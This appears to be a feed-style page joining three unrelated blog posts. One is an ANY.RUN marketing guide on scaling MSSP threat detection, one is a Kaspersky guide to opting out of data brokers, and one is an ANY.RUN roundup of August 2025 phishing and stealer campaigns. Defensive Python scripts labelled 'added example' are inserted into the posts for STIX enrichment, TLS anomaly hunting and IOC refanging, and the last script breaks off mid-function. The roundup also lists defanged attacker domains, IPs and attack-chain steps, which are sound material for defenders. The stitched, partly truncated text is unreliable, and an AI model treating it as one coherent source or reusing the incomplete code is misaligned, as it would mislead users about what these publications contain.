MSSP Growth Guide: Scaling Threat Detection for Expanding Client Base 

An MSSP leader is no stranger to the relentless pressure of growth. With an expanding client base comes the daunting task of scaling threat detection capabilities without compromising quality, speed, or the bottom line. The challenge that rises above all others is how to grow while keeping the balance between human capacity and organizational demands.

Human Dilemma: Analysts Under Pressure 

Hiring more analysts isn’t always possible. The global cybersecurity talent shortage makes it difficult. And even if talent were available, inflating staff costs could ruin the business model. Yet, overloading existing teams creates its own risks such as burnout, alert fatigue, and costly mistakes. 

At the core of MSSP growth lies a paradox: human talent is your most valuable asset, but also your most limited resource. 

Threat analysts are the backbone of MSSPs. But their daily work is often filled with repetitive tasks, cognitive overload, and stress from high expectations. Without the right support, even the most capable teams risk crumbling under pressure. 

Analyst Burnout Crisis: Where Efficiency Goes to Die

Why won’t adding more analysts solve your scaling problem? Each additional team member inherits these same systemic issues, multiplying your operational costs without proportionally increasing your detection effectiveness. 

Work aspect, the challenge it creates, and its effect on analysts:

  • Alert triage and prioritization: decision fatigue. Constant high-stakes choices lead to poor judgment and delayed responses.
  • Repetitive false-positive investigation: learned helplessness. Analysts become skeptical of all alerts and miss genuine threats.
  • Context switching between multiple client environments: cognitive overload. Mental energy is wasted on remembering different tools, processes, and threat landscapes.
  • Manual threat intelligence gathering: research rabbit holes. Time is spent hunting for IOCs that may not even be relevant.
  • Escalation decision-making under time pressure: imposter syndrome. Fear of making the wrong call leads to over-escalation and eroded confidence.
  • 24/7 monitoring demands: chronic stress and alert fatigue. Physical and mental exhaustion compromise analytical quality.
  • Lack of closure on investigated incidents: psychological incompleteness. Never learning the outcome creates job dissatisfaction and turnover.

The danger? Analysts become reactive instead of proactive, struggling to keep up rather than driving MSSP growth. 

The Force Multiplier Approach: Amplifying Human Intelligence 

Scaling effectively doesn’t mean hiring more people — it means enabling the people you already have to work smarter. This approach allows you to: 

  • Reduce analyst burnout while improving job satisfaction. 
  • Maintain high-quality threat detection as you onboard new clients. 
  • Build a competitive advantage through superior efficiency. 

This is where ANY.RUN’s Threat Intelligence solutions step in. By combining automation with analyst-driven insight, they give MSSPs the edge to scale without compromise. 

Threat Intelligence Feeds: Fresh Fuel for Proactive Defense 

Key features of ANY.RUN’s TI Feeds, data sources, integration options 

ANY.RUN’s TI Feeds represent a paradigm shift from traditional threat intelligence. Instead of static, aging IOCs, TI Feeds deliver fresh threat indicators extracted from real-time analysis sessions where malware samples are analyzed for behavior, tactics, techniques, and procedures (TTPs). 

These feeds are accurate, comprehensive, and timely, enriched with contextual details like threat relationships and campaign associations. They come in industry-standard formats such as STIX and MISP for seamless integration into your existing SIEM, EDR, or other security systems.  
 
Key features include real-time updates from thousands of daily analyses, coverage of network-based IOCs (e.g., malicious IPs, domains), file hashes, and behavioral indicators, all sourced from a global community of over 15,000 organizations analyzing the latest threats. 
 
Here’s how TI Feeds help an MSSP team work more effectively and efficiently:

  • Automated Threat Enrichment: Automatically correlate incoming alerts with fresh IOCs, reducing manual triage time and minimizing false positives, so analysts can prioritize real dangers. 
  • Proactive Detection at Scale: Feed real-time indicators into your tools to block emerging threats before they hit clients, allowing your team to handle more volume without overload. 
  • Contextual Insights for Faster Decisions: Provide enriched data on threat behaviors and TTPs, enabling analysts to understand attacks deeply and respond with precision, cutting investigation hours. 
  • Cost-Effective Integration: Easy plug-and-play with existing infrastructure means no steep learning curves or additional hires, optimizing resource use across growing client bases. 
  • Reduced Alert Fatigue: By filtering out noise with high-quality, verified IOCs, analysts stay sharp and engaged, boosting morale and retention. 
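What feed-driven enrichment looks like in practice, as an added example (this is not ANY.RUN's code and not its feed schema): a small Python script loads a STIX 2.1 indicator bundle, drops indicators whose `valid_until` has passed, and tags alerts whose fields match a live indicator. The bundle and the alerts are constructed (RFC 5737 addresses, `.test` domains, an all-`a` hash); the alert field names `dest_ip`, `domain`, `sha256` are assumptions about the SIEM export, and only the simple equality form of STIX patterns is parsed, which is what most IOC feeds emit.

```python
"""Correlate SIEM alerts against a STIX 2.1 indicator feed (added example)."""
import json
import re
from datetime import datetime, timezone

# Constructed STIX 2.1 bundle standing in for a fetched feed. Not real data:
# RFC 5737 addresses and .test domains, so nothing here resolves.
FEED_JSON = json.dumps({
    "type": "bundle",
    "id": "bundle--4f0c2b4e-0000-4000-8000-000000000001",
    "objects": [
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--4f0c2b4e-0000-4000-8000-000000000002",
         "created": "2025-08-20T10:00:00Z", "modified": "2025-08-20T10:00:00Z",
         "name": "stealer C2", "labels": ["malicious-activity"],
         "pattern_type": "stix",
         "pattern": "[ipv4-addr:value = '198.51.100.7' OR ipv4-addr:value = '203.0.113.9']",
         "valid_from": "2025-08-20T10:00:00Z", "valid_until": "2025-09-20T10:00:00Z"},
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--4f0c2b4e-0000-4000-8000-000000000003",
         "created": "2025-08-25T08:00:00Z", "modified": "2025-08-25T08:00:00Z",
         "name": "phishing landing", "labels": ["malicious-activity"],
         "pattern_type": "stix",
         "pattern": "[domain-name:value = 'login-verify.example.test']",
         "valid_from": "2025-08-25T08:00:00Z", "valid_until": "2025-09-25T08:00:00Z"},
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--4f0c2b4e-0000-4000-8000-000000000004",
         "created": "2025-08-01T00:00:00Z", "modified": "2025-08-01T00:00:00Z",
         "name": "old dropper hash", "labels": ["malicious-activity"],
         "pattern_type": "stix",
         "pattern": "[file:hashes.'SHA-256' = '" + "a" * 64 + "']",
         "valid_from": "2025-08-01T00:00:00Z", "valid_until": "2025-08-15T00:00:00Z"},
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--4f0c2b4e-0000-4000-8000-000000000005",
         "created": "2025-08-28T00:00:00Z", "modified": "2025-08-28T00:00:00Z",
         "name": "sigma rule, not an IOC", "labels": ["malicious-activity"],
         "pattern_type": "sigma", "pattern": "title: ...",
         "valid_from": "2025-08-28T00:00:00Z"},
    ],
})

# STIX object path -> alert field it is matched against (field names assumed).
PATH_TO_FIELD = {
    "ipv4-addr:value": "dest_ip",
    "domain-name:value": "domain",
    "url:value": "url",
    "file:hashes.'SHA-256'": "sha256",
    "file:hashes.MD5": "md5",
}
# One "path = 'value'" comparison; findall() also handles OR-joined patterns.
COMPARISON = re.compile(r"([\w:.'-]+)\s*=\s*'([^']+)'")


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def load_indicators(feed_json, now):
    """Return {field: {value: indicator_name}} for unexpired STIX-pattern indicators."""
    lookup = {field: {} for field in PATH_TO_FIELD.values()}
    for obj in json.loads(feed_json)["objects"]:
        if obj.get("type") != "indicator" or obj.get("pattern_type", "stix") != "stix":
            continue
        if "valid_until" in obj and _ts(obj["valid_until"]) <= now:
            continue  # aged out: stale IOCs are exactly the noise we want to avoid
        for path, value in COMPARISON.findall(obj["pattern"]):
            field = PATH_TO_FIELD.get(path)
            if field:
                lookup[field][value.lower()] = obj["name"]
    return lookup


def enrich_alert(alert, lookup):
    """Attach matching indicator names and raise priority when any field matches."""
    matches = []
    for field, values in lookup.items():
        observed = alert.get(field)
        if observed and observed.lower() in values:
            matches.append((field, observed, values[observed.lower()]))
    enriched = dict(alert)
    enriched["ti_matches"] = matches
    enriched["priority"] = "high" if matches else alert.get("priority", "low")
    return enriched


def enrich_all(alerts, feed_json, now):
    lookup = load_indicators(feed_json, now)
    return [enrich_alert(a, lookup) for a in alerts]


# Constructed alerts standing in for a SIEM export.
SAMPLE_ALERTS = [
    {"id": 1, "dest_ip": "198.51.100.7", "priority": "low"},
    {"id": 2, "domain": "LOGIN-VERIFY.example.test", "priority": "low"},
    {"id": 3, "sha256": "a" * 64, "priority": "low"},   # only the expired hash matches
    {"id": 4, "dest_ip": "192.0.2.1", "priority": "low"},
]
DEMO_NOW = datetime(2025, 9, 1, tzinfo=timezone.utc)


def demo():
    return enrich_all(SAMPLE_ALERTS, FEED_JSON, DEMO_NOW)


if __name__ == "__main__":
    for a in demo():
        print(a["id"], a["priority"], a["ti_matches"])
```

Alert 3 stays low because the only hash it matches expired on 15 August; honoring `valid_until` is what keeps an aging feed from generating the false positives the list above warns about. A MISP export would need a different loader, but the lookup and enrichment steps are the same.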

Threat Intelligence Lookup: Your On-Demand Threat Intelligence Powerhouse

TI Lookup acts as a search engine for threats — allowing analysts to quickly investigate suspicious IOCs, files, domains, and hashes. Instead of digging through multiple sources or waiting for reports, they can instantly connect the dots. 

How TI Lookup works: check a potential IOC such as an IP address and get an instant verdict plus related IOCs

Key Benefits for MSSPs 

  • Faster investigations: Cut down on time-to-insight when analyzing client incidents. 
  • Single source of actionable data: Access a unified database of malware samples and indicators. 
  • Empowered analysts: Give junior analysts the same depth of insight as seasoned experts. 
  • Reduced stress: Analysts can confirm or rule out threats quickly, lowering mental load. 
  • Client trust: Deliver fast, evidence-backed answers to customers. 

Building Your Scaling Strategy: People First, Technology Second 

Successful MSSP scaling starts with understanding that your analysts are force multipliers, not just cost centers. By providing them with superior solutions like ANY.RUN’s TI Feeds and TI Lookup, you can: 

  1. Increase capacity without increasing headcount – Each analyst can effectively monitor more clients when equipped with efficient threat intelligence products.
  2. Improve retention through job satisfaction – Analysts prefer challenging, high-value work over repetitive alert triage. Better tools enable more strategic thinking and less grunt work.
  3. Deliver superior client outcomes – Faster, more accurate threat detection translates directly to improved client satisfaction and retention.
  4. Build competitive differentiation – While competitors struggle with scaling challenges, you can confidently take on new clients knowing your team has the tools to succeed.

The MSSP market will continue to grow, and client expectations will only increase. The organizations that thrive will be those that recognize the critical importance of human talent and invest in services that amplify rather than replace human intelligence. 

ANY.RUN’s threat intelligence solutions provide the foundation for this approach. When your analysts have access to fresh, contextual threat intelligence at their fingertips, they transform from reactive alert processors into proactive threat hunters.

About ANY.RUN  

Trusted by over 500,000 cybersecurity professionals and 15,000+ organizations in finance, healthcare, manufacturing, and other critical industries, ANY.RUN helps security teams investigate threats faster and with greater accuracy.  

Our Interactive Sandbox accelerates incident response by allowing you to analyze suspicious files in real time, watch behavior as it unfolds, and make confident, well-informed decisions.  

Our Threat Intelligence Lookup and Threat Intelligence Feeds strengthen detection by providing the context your team needs to anticipate and stop today’s most advanced attacks.  



The post MSSP Growth Guide: Scaling Threat Detection for Expanding Client Base  appeared first on ANY.RUN’s Cybersecurity Blog.

How to remove your information from personal data brokers’ databases | Kaspersky official blog

Data brokers compile extensive dossiers on you to resell later. They’re interested in all of us — hundreds of millions of folks worldwide — and they don’t ask for our permission or pay us any compensation. Most of these companies aren’t well known, and you’ve likely never had any direct contact with them. But there are around a thousand of them in the U.S. alone, and five times as many worldwide. This market was estimated at nearly $300 billion last year. Data brokers’ clients include banks checking credit history, retailers looking for new customers, intelligence agencies, and many other organizations that need detailed data on individuals.

What do data brokers collect, and where from?

Data brokers collect anything and everything they can get their hands on. Most often:

  • Personal information: full names, physical addresses, dates of birth, phone numbers, email addresses, identification numbers (passports, driver’s licenses, social security numbers, etc.)
  • Age, gender, origin, marital and financial status, level and type of education
  • Number and type of pets
  • Car make and mileage
  • Geolocation data: likely places of work and residence, favorite stores, entertainment spots
  • Details on online and offline purchases, membership in retailer loyalty programs, favorite brands
  • Detailed financial information: creditworthiness, number and types of accounts, deposits, investments, mortgages, credit card habits, bankruptcy data
  • Online behavior data: favorite websites, types of content frequently viewed on social media, hobbies, recently viewed ads, etc.
  • Health information, including data on medication purchases, online symptom searches, data from fitness apps
  • Habits, interests, political and religious beliefs, favorite media outlets
  • Social connections: family members, coworkers, friends

To compile such an intimidatingly detailed file, brokers download any publicly available data (social media profiles, business registries, real estate registries, online classified ads), request information from credit bureaus, and buy data from each other. They also purchase data from loyalty programs, and analytics from gadget vendors. And they collaborate with online advertising and tracking firms — especially those that place ads in mobile apps.

All this information is cross-referenced using recurring identifiers (email addresses, phone numbers, names and addresses, ID numbers) to enrich each profile.

What’s so bad about data collection?

Collected and resold data has an invisible yet significant impact on your life. Why were you denied a loan, or why did your insurance premium go up? How come real estate agents have your phone number when you only decided to buy a house yesterday? According to a U.S. Senate committee investigation, some data brokers’ collections are clearly designed to exploit people’s difficult circumstances. The names of these datasets speak for themselves: “Rural and Barely Making It”, “Retiring on Empty: Singles”, and “Tough Start: Young Single Parents”. Information like this is often purchased by payday loan providers. Other collections are ominously named too, such as “Individuals who recently visited abortion clinics”.

In an extreme example from 2025, a killer bought data on victims’ residential addresses from publicly available data broker websites to track and assassinate political targets in the U.S.

The same Senate investigation highlights that brokers usually operate in secrecy. They collect data without directly interacting with consumers, often hide their data sources, and prohibit their buyers from revealing where contact lists were obtained.

Note that data brokers, like any other companies, are vulnerable to cyberattacks. When they’re breached, the data they’ve collected falls into the hands of true cybercriminals. The scale of the consequences for victims of a data breach can be illustrated with just one case: last year, hackers stole a database containing 2.7 billion records from a company named National Public Data. The records included full names, addresses, dates of birth, phone numbers, and social security numbers (SSNs). It’s believed that the breach affected every US citizen or resident with an SSN!

The challenges of getting your data removed

While the world is gradually introducing legislation to force data brokers to comply with user requests to find and remove personal information, the process can be quite challenging in practice.

  • There’s no centralization. You have to search for your own data on each data broker’s website and make separate removal requests.
  • Even locating data brokers — not to mention the page on their website where you can make a request — can be fraught with difficulty. According to a recent study by The Markup, in California alone — where local legislation mandates centralized registration of data brokers and requires data removal upon a user request under the CCPA — 35 out of 499 registered data brokers prohibited search engines from indexing and displaying their data removal pages. The removal link itself is often buried deep in the website’s footer or elsewhere (in one case it was found on page 15 of the privacy policy).
  • Information removal requests are often complex and consist of multiple steps. They may even require more personal data from you to prove that you are indeed you, and you have the right to submit a request. A study by UC Irvine highlighted some exotic methods of identity verification, such as providing your zodiac sign or your monthly car loan payment amount. If the request isn’t worded correctly or the verification data isn’t provided, the request is ignored.
  • The same study found that, out of 454 information removal requests submitted, 195 (43%) were ignored.

How to actually remove yourself from data brokers’ databases

If you’re up for a challenge, arm yourself with both patience and a spreadsheet (in Excel or similar), and follow our instructions:

  • First, identify the data brokers you want to contact. You can find a full up-to-date list from the Privacy Rights Clearinghouse, but it’s heavily focused on U.S.-based companies. While they’re the biggest players in the market, be sure to find brokers specific to your region as well.
  • Create and save a standard template for your removal request email. The message should include your key personal details and reference the applicable laws in your case: CCPA for California residents; GDPR for the EU; UK-GDPR for the UK; LGPD for Brazil; 152-FZ for Russia. Even if you don’t live in one of these regions, you can still reference CCPA or GDPR — some providers will honor the request without verifying if the law directly applies to you.
  • For each data broker, locate the page for submitting a request, which might be named “Opt Out”, “Do Not Sell”, “Privacy Request”, “Right to Delete”, “Right to Be Forgotten”, or something along those lines. Your best bet is to start by looking for small-print links in the footer of the web page. If you can’t find anything there, check the privacy policy section. You can also try a Google search.
  • Carefully review the broker’s specific requirements. If they require you to send a request via email, simply send your template to the provided address. If an online form is required, fill in the fields using snippets from the same template.
  • In your spreadsheet, indicate the name of the broker, the date you submitted the request, and the URL of the request page (so you don’t have to search for it again).
  • Be patient — a response (if you get one at all) could take up to six weeks. This is where your spreadsheet comes in handy — you can use it to track response times and send follow-up requests as needed.
  • For those who lack the time or patience, there are paid services that can automatically send these requests for you.
  • Most importantly, this isn’t a one-time process. Data about you is constantly being collected and sold to brokers, so you should go through the same list again every three to six months.

How to stay off data brokers’ lists in the first place

It’s near impossible to avoid getting noticed by data brokers altogether, but you can minimize the amount of data they collect.

  • Use multiple email addresses and phone numbers. One for communicating with friends, family, banks, and government agencies. A different one for online stores and non-essential services. You can even use more than two email addresses.
  • Provide minimal information to loyalty programs.
  • Go through the settings in your online banking apps and on your favorite e-commerce sites. Make sure you’ve turned off all permissions in sections like “Marketing Data”, “Advertising Preferences”, and “Partner Offers”. Feeding data to brokers is often disguised under phrases like “Show me ads based on my interests”.
  • Turn off and reset advertising IDs on your smartphone.
  • Disable location tracking for most of your apps.
  • Use the privacy settings in social networks and messaging apps.
  • Use a private browser or an app that protects against online tracking. Special privacy features are available in Kaspersky Premium.
  • Take advantage of our free Privacy Checker service to adjust your privacy settings everywhere — from social networks to operating systems.
  • Subscribe to our Telegram channel to be the first to learn about new threats to your privacy and how to combat them. For example, we’ll soon be publishing detailed instructions on how to minimize and clean up your digital footprint (for both adults and minors).


Major Cyber Attacks in August 2025: 7-Stage Tycoon2FA Phishing, New ClickFix Campaign, and Salty2FA

Phishing kits and stealers didn’t slow down this August, and neither did we. ANY.RUN analysts tracked some of the month’s most dangerous campaigns, from a 7-stage Tycoon2FA phishing chain to Rhadamanthys delivered via ClickFix, and the discovery of Salty2FA, a brand-new PhaaS framework linked to Storm-1575.

All were analyzed inside ANY.RUN’s Interactive Sandbox, revealing full execution chains, decrypted traffic, and behavior missed by static tools. Combined with Threat Intelligence Lookup, these insights help SOC teams turn raw IOCs into actionable detection rules and cut investigation time when it matters most. 

Let’s explore how these attacks worked, what they targeted, and the insights SOC teams can take away. 

Tycoon2FA: New 7-Stage Phishing Attack Beats Top Security Systems 


ANY.RUN analysts uncovered a multi-stage Tycoon2FA campaign that takes phishing beyond the usual fake login page. Instead, it runs victims through a seven-step execution chain packed with CAPTCHAs, button-hold checks, and validation screens; each designed to wear down humans and outsmart automated security tools. By the time the final phishing panel appears, most defenses have already failed. 

Unlike mass phishing kits that cast a wide net, Tycoon2FA is highly selective. It goes after accounts that unlock access to critical systems and sensitive data, not just ordinary inboxes. 

Key industries targeted by Tycoon2FA 

Recent campaigns have zeroed in on government and military agencies, as well as financial institutions ranging from global banks to regional insurers. Activity has been observed across the US, UK, Canada, and Europe, where a single stolen login can cause major financial losses or even disrupt national operations. 

ANY.RUN data shows that 26% of Tycoon2FA cases analyzed in our sandbox involved the banking sector; clear evidence that attackers are deliberately aiming at high-value targets. 

7-Stage Execution Flow Exposed inside ANY.RUN 

In a recent ANY.RUN analysis, Tycoon2FA unfolded in this order: 

Check Real Case: Multi-Stage Tycoon2FA Attack 

Execution chain of multi-stage Tycoon2FA campaign 
  1. Phishing email link → The attack begins with a voicemail-themed phishing email containing a malicious link to lure the victim. 
  2. PDF attachment → Clicking the link triggers a fake PDF download, masking the next redirection step. 
  3. Link inside PDF → The PDF itself hides another embedded hyperlink, pushing the victim deeper into the chain. 
  4. Cloudflare Turnstile CAPTCHA → A CAPTCHA challenge filters out automated scanners by requiring human interaction. 
  5. “Press & Hold” anti-bot check → A second verification forces a hold-and-release gesture, further blocking automation. 
  6. Email validation page → The victim is asked to “verify” their email, confirming they are real and a worthwhile target. 
  7. Final phishing panel → At the end, a fake Microsoft login page is revealed, ready to steal the victim’s credentials. 

With ANY.RUN’s Automated Interactivity, analysts can replicate each click and CAPTCHA, exposing the entire chain in minutes. This delivers not just IOCs, but also behavioral indicators that SOC teams can fold directly into detection rules and SOAR playbooks, reducing investigation time and keeping attacks like Tycoon2FA from slipping through. 

See decrypted traffic and examine the full threat context: Tycoon2FA Analysis Session.

Detailed analysis of Tycoon 2FA attack inside ANY.RUN’s Sandbox 

Check out the following TI Lookup search query to track Tycoon campaigns and adjust detection rules accordingly: threatName:"tycoon" 

ANY.RUN Sandbox analyses with Tycoon  

Gathered IOCs: 

  • *[.]filecloudonline[.]com  
  • vnositel-bg[.]com  
  • culturabva[.]es  
  • spaijo[.]es  
  • dvlhpbxlmmi[.]es  
  • pyfao[.]es 

Rhadamanthys Stealer Delivered via ClickFix with PNG Steganography 


A new wave of phishing campaigns shows how attackers are pairing ClickFix social engineering flows with advanced malware families. This time, the target is Rhadamanthys Stealer, a C++ infostealer known for extensive data theft capabilities and advanced evasion. 

Earlier ClickFix campaigns primarily deployed NetSupport RAT or AsyncRAT. The switch to Rhadamanthys signals a step up in stealth and payload sophistication, as threat actors blend social engineering and technical obfuscation to bypass defenses. 

In the observed case inside ANY.RUN sandbox, a phishing domain initiates a ClickFix flow (MITRE T1566), leading the user to download and execute a malicious MSI payload. 

View real case with Rhadamanthys delivered via ClickFix 

ClickFix flow analyzed inside ANY.RUN sandbox 

The chain unfolds as: 

ClickFix ➡ msiexec ➡ EXE file ➡ compromised system file ➡ PNG-stego payload 

Detailed Rhadamanthys attack chain 
  • The MSI is executed silently in memory (T1218.007) and installs Rhadamanthys into a disguised directory under the user profile. 
  • Anti-VM checks (T1497.001) are performed to evade analysis. 
  • A compromised system file initiates TLS connections directly to IPs, bypassing DNS monitoring. 
  • Attackers use self-signed TLS certificates with mismatched Issuer/Subject fields, leaving unique hunting artifacts. 
  • Additional payloads are delivered via an obfuscated PNG using steganography (T1027.003). 
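One way to turn the two TLS artifacts above (connections made straight to an IP, and certificates that are self-signed or otherwise not from a public CA) into a hunt query, as an added example that is not ANY.RUN code: the script reads a Zeek-style `ssl.log` excerpt, flags sessions with no SNI or an IP-literal SNI, flags certificates whose issuer equals the subject or whose issuer organization is outside an allowlist, and rates the combination of the two highest. The log lines are constructed (RFC 5737 addresses, `.test` names); the Zeek column names and the trusted-issuer list are assumptions to adapt to your own telemetry.

```python
"""Hunt direct-to-IP TLS with non-public certificates in a Zeek-style ssl.log (added example)."""
import ipaddress

# Constructed ssl.log excerpt, tab separated, '-' meaning unset. Not real traffic.
SSL_LOG = """\
#fields\tts\tid.orig_h\tid.resp_h\tid.resp_p\tserver_name\tsubject\tissuer
1724846400.10\t10.0.0.5\t198.51.100.7\t443\t-\tCN=Temp,O=Internal\tCN=Cloud Auth CA
1724846401.20\t10.0.0.5\t203.0.113.9\t443\t203.0.113.9\tCN=localhost\tCN=localhost
1724846402.30\t10.0.0.8\t192.0.2.44\t443\tupdates.example.test\tCN=updates.example.test\tCN=R11,O=Let's Encrypt,C=US
1724846403.40\t10.0.0.8\t192.0.2.45\t443\tcdn.example.test\tCN=cdn.example.test\tCN=cdn.example.test
"""

# Issuer organizations treated as "public CA" (assumed allowlist; extend per environment).
TRUSTED_ISSUER_ORGS = {"Let's Encrypt", "DigiCert Inc", "Microsoft Corporation"}


def parse_dn(dn):
    """Split an X.500-style DN 'CN=a,O=b' into {attr: value}.
    Escaped commas are not handled; enough for log excerpts like the one above."""
    out = {}
    if dn == "-":
        return out
    for part in dn.split(","):
        if "=" in part:
            key, value = part.split("=", 1)
            out[key.strip().upper()] = value.strip()
    return out


def parse_ssl_log(text):
    """Parse the tab-separated Zeek format using the #fields header for column names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def is_ip_literal(name):
    try:
        ipaddress.ip_address(name)
        return True
    except ValueError:
        return False


def classify_tls(row):
    """Return (severity, reasons) for one session; severity None means nothing to report."""
    reasons = []
    sni = row["server_name"]
    if sni == "-" or is_ip_literal(sni):
        reasons.append("direct_to_ip")  # no hostname was resolved, so DNS telemetry never saw it
    subject, issuer = parse_dn(row["subject"]), parse_dn(row["issuer"])
    if row["subject"] == row["issuer"]:
        reasons.append("self_signed")
    elif issuer.get("O") not in TRUSTED_ISSUER_ORGS:
        reasons.append("untrusted_issuer")
    if sni != "-" and not is_ip_literal(sni) and subject.get("CN") != sni:
        reasons.append("cn_sni_mismatch")
    # A non-public certificate on a session made straight to an IP is the pattern
    # worth hunting; the same certificate behind a normal hostname is only "review".
    if "direct_to_ip" in reasons and ("self_signed" in reasons or "untrusted_issuer" in reasons):
        severity = "high"
    elif reasons:
        severity = "low"
    else:
        severity = None
    return severity, reasons


def hunt(rows):
    """Return findings for every session that trips at least one rule."""
    findings = []
    for row in rows:
        severity, reasons = classify_tls(row)
        if severity:
            findings.append({"resp_h": row["id.resp_h"], "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in hunt(parse_ssl_log(SSL_LOG)):
        print(finding["severity"], finding["resp_h"], ", ".join(finding["reasons"]))
```

The fourth session (a self-signed certificate behind a matching hostname) is deliberately rated low: internal services do that all the time, and the signal the write-up describes is the pairing of an odd certificate with a session that never went through DNS.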

To stop Rhadamanthys, SOC teams need to look beyond static IOCs. Detecting ClickFix flows and steganography payloads requires behavioral visibility, while TLS anomaly hunting helps expose the mismatched certificates attackers use for covert traffic.  

With ANY.RUN’s Interactive Sandbox, analysts can replicate user actions, uncover hidden execution in memory, and turn these insights into actionable rules and automated response playbooks, cutting investigation time and strengthening SOC workflows. 

Track similar campaigns in TI Lookup and enrich IOCs with live attack data from threat investigations across 15K SOCs

ANY.RUN Sandbox analyses with ClickFix social engineering flows 
IOCs for threat detection and research: 

  • 84.200[.]80.8 
  • 179.43[.]141.35
  • 194.87[.]29.253
  • flaxergaurds[.]com
  • temopix[.]com
  • zerontwoposh[.]live
  • loanauto[.]cloud
  • wetotal[.]net 

Salty2FA: New Phishing Framework from Storm-1575 Targeting US and EU 


Detailed breakdown of Salty2FA 

ANY.RUN analysts uncovered Salty2FA, a new Phishing-as-a-Service (PhaaS) framework engineered to bypass nearly all known 2FA methods. First spotted in June 2025, it has since evolved into an active campaign targeting Microsoft 365 accounts across the US, Canada, Europe, and global holdings.

The kit is named for its distinctive “salting” of source code, a tactic that disrupts both static and manual analysis. It unfolds through a multi-stage execution chain delivered via phishing emails and links (MITRE T1566). Infrastructure relies on a recurring pattern: compound .??.com subdomains paired with .ru domains (T1583), supported by chained servers and resilient C2 communication (T1071.001). 

Salty2FA also implements adversary-in-the-middle techniques (T1557), enabling it to intercept phone app push notifications, OTP codes, SMS messages, and even two-way voice calls. This gives attackers access well beyond stolen credentials. 

Salty2FA phishing kit execution chain 

Attribution and Targets 

Infrastructure and IOCs overlap with the Storm-1575 group, the actor behind the Dadsec phishing kit, though some traits suggest possible ties to Storm-1747 (Tycoon2FA). Whatever its origin, Salty2FA remains a distinct framework, now actively deployed against industries including: 

  • Finance and Insurance 
  • Energy and Manufacturing 
  • Healthcare and Telecom 
  • Government, Education, and Logistics 

Salty2FA proves that modern PhaaS is about persistent, adaptive frameworks built to evade detection. Static IOCs alone are unreliable; spotting this threat requires behavioral analysis of its execution chain and continuous monitoring of domain patterns. 

With ANY.RUN’s Interactive Sandbox, analysts can replicate user interaction to reveal hidden flows and extract high-fidelity indicators. Combined with TI Lookup queries, SOC teams can track evolving Salty2FA infrastructure, enrich detection logic, and cut MTTR by acting before intrusions escalate.

Check an example analysis session to examine Salty2FA behavior, download an actionable report, and collect IOCs. 

Fake Microsoft page exposed inside ANY.RUN’s Sandbox 

Further investigate Salty2FA, track campaigns, and enrich IOCs with live attack data using TI Lookup: 

ANY.RUN Sandbox analyses with Salty2FA 

Gathered IOCs: 

  • innovationsteams[.]com  
  • marketplace24ei[.]ru  
  • nexttradeitaly[.]it[.]com  
  • frankfurtwebs[.]com[.]de  
  • hxxps[://]telephony[.]nexttradeitaly[.]com/SSSuWBTmYwu/  
  • hxxps[://]parochially[.]frankfurtwebs[.]com[.]de/ps6VzZb/  
  • hxxps[://]marketplace24ei[.]ru//  
  • hxxps[://]marketplace24ei[.]ru/790628[.]php  
  • 153[.]127[.]234[.]4  
  • 51[.]89[.]33[.]171  
  • 191[.]96[.]207[.]129  
  • 153[.]127[.]234[.]5  
  • izumi [at] yurikamome[.]com 
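To make lists like the ones above usable, as an added example that is not ANY.RUN tooling: refang the defanged entries, classify each as IP, URL, email or domain, and check every host against the naming pattern described for Salty2FA (compound `.??.com` / `.com.??` names paired with `.ru` domains). The input is copied from the IOC lists on this page (the Salty2FA set plus the wildcard Tycoon2FA domain). The compound-domain check is a heuristic: `com.au`, `com.br` and similar are legitimate ccSLDs, so the allowlist below is a partial assumption and should be fed from the Public Suffix List in production.

```python
"""Refang, classify, and pattern-check a defanged IOC list (added example)."""
import ipaddress
import re
from urllib.parse import urlsplit

# Copied from the IOC lists on this page; defanged exactly as published.
RAW_IOCS = [
    "*[.]filecloudonline[.]com",
    "innovationsteams[.]com",
    "marketplace24ei[.]ru",
    "nexttradeitaly[.]it[.]com",
    "frankfurtwebs[.]com[.]de",
    "hxxps[://]telephony[.]nexttradeitaly[.]com/SSSuWBTmYwu/",
    "hxxps[://]parochially[.]frankfurtwebs[.]com[.]de/ps6VzZb/",
    "hxxps[://]marketplace24ei[.]ru//",
    "hxxps[://]marketplace24ei[.]ru/790628[.]php",
    "153[.]127[.]234[.]4",
    "51[.]89[.]33[.]171",
    "191[.]96[.]207[.]129",
    "153[.]127[.]234[.]5",
    "izumi [at] yurikamome[.]com",
]

# Real public ccSLDs of the form com.<cc>; partial list (assumption), so a hit
# here is ordinary hosting, not compound attacker infrastructure.
PUBLIC_COM_CC = {"au", "br", "mx", "tr", "ar", "cn", "tw", "sg", "my", "hk",
                 "pk", "ph", "vn", "co", "pe", "ve", "uy", "eg", "sa", "ng"}

DOMAIN_RE = re.compile(r"^(\*\.)?[a-z0-9-]+(\.[a-z0-9-]+)+$", re.I)
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def refang(ioc):
    """Undo common defanging: [.] (.) {.}, hxxp, [://], [:], [at], [@]."""
    s = ioc.strip()
    s = re.sub(r"\s*\[(?:at|@)\]\s*", "@", s, flags=re.I)
    s = re.sub(r"\[://\]", "://", s)
    s = re.sub(r"\[:\]", ":", s)
    s = re.sub(r"[\[({]\.[\])}]", ".", s)
    s = re.sub(r"^hxxp", "http", s, flags=re.I)
    return s


def classify(ioc):
    """Return (kind, refanged value) with kind in ip | url | email | domain | unknown."""
    value = refang(ioc)
    try:
        ipaddress.ip_address(value)
        return "ip", value
    except ValueError:
        pass
    if value.lower().startswith(("http://", "https://")):
        return "url", value
    if EMAIL_RE.match(value):
        return "email", value
    if DOMAIN_RE.match(value):
        return "domain", value.lower()
    return "unknown", value


def infrastructure_pattern(host):
    """Flag the compound naming described for Salty2FA, plus the .ru half of the pairing."""
    labels = host.lower().lstrip("*.").split(".")
    if len(labels) >= 3:
        sld, tld = labels[-2], labels[-1]
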